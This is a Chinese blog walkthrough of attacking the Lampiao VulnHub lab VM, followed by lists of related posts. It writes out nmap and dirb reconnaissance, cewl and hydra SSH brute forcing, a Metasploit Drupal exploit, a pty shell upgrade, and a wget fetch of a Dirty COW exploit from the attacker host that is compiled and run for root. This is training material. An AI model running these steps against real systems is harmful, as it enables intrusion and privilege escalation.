Lampiao零基础渗透测试

已于 2023-06-14 13:30:09 修改
阅读量215 收藏 1
点赞数
文章标签: linux 运维 服务器
于 2023-06-12 20:58:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56537388/article/details/131168437
版权

Lampiao靶机:链接:https://pan.baidu.com/s/1F2Yf7SsryDGdDgxSEVC6EQ?pwd=uwuk 
提取码:uwuk 

kali:ip地址192.168.182.130

靶机:ip地址192.168.182.131

靶机与kali都为NAT模式

1.确定目标

 nmap -sP ip/24 :扫描这个网段存活的主机IP

 分析:扫出了5个IP,但是1,2,254三个地址是自带的,130地址为kali地址,那么131地址就是靶机地址

2.信息收集

nmap -p- ip :扫描这个IP开放的的端口

可以看到,靶机开放了22,80,1898端口,百度查询各个端口作用:

22:默认是用于LInux主机的SSH远程服务应用的端口号,用于通过命令行模式远程连接系统服务器

80:80是http协议的默认端口

首先试着访问80端口,发现什么都没有

 接下来访问1898端口

 出现了一个页面,猜测其中有需要的信息,想到以下方法:

发现有输入输出框:sql注入,爆破,XSS

目录遍历:寻找敏感文件

查看源代码,发现找不到线索

点击图片

看到这个地址:http://192.168.182.131:1898/?q=node/1

 试着把1改成2

发现两个目录,试着访问一下

 

 录音是:user tiago ,看来找到用户名了

另一个文件是一个二维码,扫一下是 try harder,mahahaha,估计是要暴力破解

dirb http://192.168.182.131:1898/

使用kali自带的dirb工具进行扫描开始扫描

可以看到robots.txt文件,robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的。这个文件通常包括我们需要的信息

访问robots.txt,直接看到Disallow,不允许查看的文件

 先查看第一个/CHANGELOG.txt,发现一个版本信息,这样,信息收集就算完成了

3.发现漏洞

(我的步骤都是在桌面打开终端)

既然已经获取了账号名,可以尝试暴力破解

cewl http://192.168.182.131:1898/ -w yc.txt

cewl是一个字典生成工具,使用cewl爬取网站信息生成字典,然后再把字典保存在yc.txt中

 使用hydra进行爆破,命令为

hydra -l tiago -P yc.txt 192.168.182.131 ssh

 

ssh user@IP 

上面的是第一种思路,通过已知账号名使用 cvwl,hydra等工具进行爆破,获得账号密码后使用ssh来登录

4.漏洞利用

 第二种思路,前面信息收集获取了CMS版本号,可以通过查询这个版本的历史漏洞来尝试进行攻击

可见,靶机是有这个漏洞的

开始使用kali的一个非常强大的工具msfconsole

 

通过search Drupal来找到EXP(exploit),利用的意思

通过这个漏洞是2018年爆出的,所以选择use 1

 show options命令查看需要输入的函数,required为yes的需要查看

rhost设置靶机的ip地址,rport端口改为1898,因为我们是通过这个端口进行攻击的

 

 run命令开始运行

我们此时拿到的是一个伪终端,我们前面拿到的那种才是真终端,现在需要把伪终端变为真终端

输入shell

输入python -c 'import pty;pty.spawn("/bin/bash")'

 5.权限提升

这个时候你发现你的用户名有一个$符,这个权限是最低的,当你输入id时显示id=1000,因此我们需要提权

uname -a查看版本信息,找到可以利用的提权方法

版本符合,可以使用 

桌面新建一个终端

kali收录了这个提取方法的exp,我们把他下载下来存放在kali,再通过http服务,用已经拿到的靶机权限把exp下载到靶机运行

searchsploit dirty

searchsploit -p linux/local/0847.cpp查看这个exp的绝对路径,也可以

使用locate  linux/local/0847.cpp

cp /usr/share/exploitdb/exploits/linux/local/40847.cpp  /home/kali/Desktop/
把这个文件放到桌面

 8083是可代理网页与下载文件端口,是一种逻辑端口

python3 -m http.server 8083

 

wget http://192.168.182.130:8083/40847.cpp

 编译cpp文件

 g++ -Wall -pedantic -O2 -std=c++11 -pthread -o yc 40847.cpp -lutil

./yc 执行exp

拿到root账号密码,直接登录

su root

 找到root路径,cat flag.txt拿到flag

 

blackK_YC
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub系列之Lampiao渗透测试
Flynn的博客
04-26 430
Lampiao 靶机下载:https://www.vulnhub.com/entry/lampiao-1,249/ 您想继续在自己的实验室中进行黑客攻击吗? 试试这个全新的易受攻击的机器!“兰皮奥 1”。
零基础打靶—Lampiao
qq_61861243的博客
08-28 509
1.确定目标:在所有的靶场中,确定目标就是使用nmap进行ip扫描,确定ip即为目标,其他实战中确定目标的方式包括nmap进行扫描,但不局限于这个nmap。2.常见的信息收集:比如平常挖洞使用fofa,天眼查,ip域名等进行查,在我们这次训练靶场中比如信息收集包括查看源码,使用工具dirb等3.发现漏洞:之前你们看到那些理论比如sql注入,文件上传等,或者找到相关的系统信息,去网上找相关的exp这些都是为了拿到webshell4.利用漏洞就是使用漏洞拿到webshell。
2、Lampiao-靶机-百个项目计划
最新发布
Labi的博客
04-26 312
学习内容nmap扫描、dirb目录爆破、cewl爬取网站关键字、hydra爆破、脏牛提权。本文仅用于技术讨论与研究,如用作非法用途作者概不负责。
lampiao靶机渗透测试
m0_56375711的博客
12-25 1527
lampiao靶机渗透测试。包括awvs、msf、脏牛漏洞提权的练习
基于lampiao渗透测试的学习笔记
gaily123的博客
10-09 1385
基于lampiao渗透测试的学习笔记 靶机lampiao与kali均为NAT模式 Kali IP为192.168.79.130 扫描网段,发现靶机ip为192.168.79.145 扫描端口,此处扫描1-65535所有,发现22,80和1898端口 查看80端口,发现页面为乱码 查看1898端口,发现另一个网页,应该是一个基于Drupal 7的博客或是社交网站 查看一下第一篇文章,发现第二...
LAMP搭建sql-labs渗透测试环境
m_de_g的博客
11-06 469
LAMP搭建sql-labs渗透测试环境 1.准备centos7下载的LAMP环境 centos7安装LAMP,请参考我的另一篇博客 https://blog.csdn.net/m_de_g/article/details/120960367 2.下载sql-labs源代码 下载地址:https://github.com/Audi-1/sqli-labs 3.下载zip文件 4.然后,将文件放在我们服务器的根目录下 可以看到我们下载好的的压缩包文件,已经被放到了我们的服务器上 5.在服务器的根目录下,
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个...通过深入研究和实践这些靶机,新手能够逐渐熟悉渗透测试的流程和技术,为未来从事网络安全工作打下坚实的基础。
vulhub渗透测试靶机学习1
08-08
渗透测试靶机学习】 渗透测试靶机是安全研究人员和网络安全爱好者用来提升技能和实践渗透测试技巧的模拟环境。在本文中,我们将讨论两个靶机环境:Lampiao 和 Kioptrix Level 1.2 (#3),以及如何对它们进行初步的...
Lampiao.zip
06-22
在这个"Lampiao.zip"压缩包中,我们可以看到几个与渗透测试相关的文件,包括"Lampiao.mf"、"Lampiao.ovf"和"Lampiao-disk1.vmdk"。 "Lampiao.mf"可能是一个Manifest文件,通常在Java或Android应用中用于记录组件和...
lampiao-开源
05-03
Lampiao是一种具有两个模块的软件:代理和服务器。 代理获取硬件/软件/网络信息,并将简历发送到服务器
渗透测试流程之LANMP
weixin_44891093的博客
09-24 1937
渗透测试流程之LANMP
渗透项目(二):Lampiao
Ays.Ie的博客
10-16 1161
2022.10.16更新第二个渗透项目Lampiao,步骤很详细,继续努力!
Lampiao 靶机练习
SYJ_361的博客
02-28 4280
利用kali对靶机进行扫描,远程登录靶机,并对靶机进行提权,找到靶机里面的文件
渗透测试lampiao(靶机渗透详细步骤)
newnewage的博客
03-12 6290
Lampiao渗透流程 action,让我们开始小白的渗透之路
靶机Lampiao之脏牛提权
m0_52754338的博客
10-02 1550
同样,将下载好的脏牛EXP,上传至目标靶机中,然后msf进入shell,然后编译成可执行文件,利用python开一个模拟终端,开启终端相当于ssh连接(通俗理解),有一个交互式连接。发现是Drupal的网站,查找相关的漏洞,存在远程代码执行的漏洞,msf中带有payload直接利用,设置攻击ip和端口,运行即可。可以看出,真正拿下Linux,权限还是不够,对Linux进行信息收集,查看可以用的漏洞,并提升权限至root。扫描靶机的端口,查看开放了哪些端口,发现1898端口开放,尝试访问。
【靶机实战记录--lampiao
qq_74240553的博客
01-16 1451
脏牛漏洞提权,vulnhub靶场
Lampião靶机渗透
weixin_56306210的博客
07-24 195
Lampião靶机渗透
003-Lampiao_vulnhub靶机全流程
zls1793的博客
10-15 206
vulnhub靶机-Lampiao全流程
lampiao靶场---脏牛提权
m0_66908617的博客
05-11 424
渗透测试前期准备攻击机:192.168.71.235(kali系统)靶机:192.168.71.191漏洞复现。
lampiao渗透测试
09-01
lampiao是一个用于渗透测试的靶机,通过对其进行渗透测试可以提高我们对主机渗透的理解和技能。渗透测试是一种以模拟真实攻击方式来评估系统安全性的方法。在进行渗透测试时,我们需要准备好lampiao靶机的环境,你可以从https://download.vulnhub.com/lampiao/Lampiao.zip下载并安装lampiao靶机。在渗透测试过程中,我们可以通过对网站目录的扫描来发现存在的网页,然后尝试寻找有用的信息。有时开发人员会将测试用的账户密码注释在配置文件中,但在这个例子中并未找到。然而,我们可以找到apache的版本号和操作系统等指纹信息。根据这些信息,我们可以搜索对应版本存在的漏洞,并利用这些漏洞进行入侵。渗透测试的目的是帮助我们发现系统中的漏洞和安全弱点,并提出相应的解决方案来加强系统的安全性。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [lampiao靶机渗透测试](https://blog.csdn.net/m0_56375711/article/details/128434954)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [vulhub渗透测试靶机学习1](https://download.csdn.net/download/weixin_35804557/86347525)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值